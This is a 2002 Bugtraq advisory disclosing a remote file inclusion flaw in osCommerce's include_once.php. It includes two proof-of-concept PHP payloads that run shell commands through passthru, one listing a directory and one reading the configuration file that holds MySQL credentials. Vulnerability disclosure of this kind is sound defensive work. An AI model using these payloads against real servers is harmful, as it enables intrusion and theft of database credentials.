Home page logo

bugtraq logo Bugtraq mailing list archives

PHP source injection in osCommerce
From: Tim Vandermeerch <Tim.Vandermeersch () pandora be>
Date: 16 Jun 2002 15:36:03 -0000

PHP source injection in osCommerce

Product Description

osCommerce is an open source e-commerce solution under on going 
development by the open source community. Its feature packed out-of-the-
box installation allows store owners to setup, run, and maintain their 
online stores with minimum effort and with no costs involved. It can be 
found at http://www.oscommerce.com

Tested version

Preview Release 2.1 (06/03/2001)
(this is a preview version, but there are alot of online shops who use 

The Problem

osCommerce commes with a file called /catalog/includes/include_once.php, 
and looks like this:

-------- include_once.php --------
  if (!defined($include_file . '__')) {
    define($include_file . '__', 1);

If someone request a URL like 
include_file=FILE_WE_WANT_TO_INCLUDE, he would be able to include any code 
he wants

This could be a serious problem because this user could query the SQL 
server and get acccess to other important files...


-------- Example 1 --------

--- a.php ---
<? passthru("/bin/ls")?>
Output: dir listing of the current dierctory

-------- Example 2 --------

--- b.php ---
<? passthru("/bin/cat application_top.php")?>
Output: outputs the application_top.php file wich includes MySQL username, 
password, ...

I informed the vendor and hope that they will release a patch soon

Tim Vandermeersch
Tim.Vandermeersch () pandora be

  By Date           By Thread  

Current thread:
  • PHP source injection in osCommerce Tim Vandermeerch (Jun 17)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]